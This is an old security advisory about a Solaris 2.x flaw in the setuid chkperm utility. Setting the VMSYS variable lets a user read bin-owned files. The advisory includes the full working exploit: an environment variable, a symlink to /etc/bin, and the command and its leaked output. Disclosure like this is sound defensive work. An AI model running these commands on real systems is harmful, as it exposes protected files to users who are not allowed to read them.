COMMAND

    /usr/vmsys/bin/chkperm

SYSTEMS AFFECTED

    Solaris 2.x

PROBLEM

    Brock  Tellier  found  following.   /usr/vmsys/bin/chkperm  can be
    used to read bin-owned files.  All testing was done on Solaris 2.7
    and 2.6 SPARC  edition.  This  one isn't nearly  as interesting as
    the  instant-shell  variety.   Here's  how  it  works.  chkperm is
    suid/sgid bin as shown:

        bash-2.02$ ls -la /usr/vmsys/bin/chkperm
        -rwsr-sr-x   1 bin      bin        10080 Sep  1  1998 /usr/vmsys/bin/chkperm

    /etc/bin  is  a  bin/bin  owned  file  mode 660 (thus shouldn't be
    readable by those not being bin) as shown:

        bash-2.02$ ls -la /etc/bin
        -rw-rw----   1 bin      bin           45 Nov 15 16:44 /etc/bin

    The exploit goes as follows:

        bash-2.02$ export VMSYS=/usr/home/$USER
        bash-2.02$ mkdir lib
        bash-2.02$ chmod 777 lib
        bash-2.02$ ln -s /etc/bin lib/.facerc
        bash-2.02$ /usr/vmsys/bin/chkperm -l
        seekret1
        seekret2
        seekret3
        seekret4
        seekr
        bash-2.02$

    As we can see,  it cuts off the  last line of five  total for some
    reason.  The meat of this exploit is the fact that chkperm  allows
    you to supply  the directory it  will write known  file names with
    VMSYS, a  big no-no.   Brock hasn't  been able  to get  chkperm to
    either a) change the permissions of an existing bin-owned file  or
    b) create a bin-owned file other than .facerc, though this can  be
    created anywhere on the  filesystem via export VMSYS=/etc  or some
    such command.

    This exploit  is sort-of  a variation  on the  old chkperm exploit
    which  allowed  .facerc  to  be  linked to /usr/bin/.rhosts.  That
    particular problem was fixed, but this one was left behind.

SOLUTION

    Nothing yet.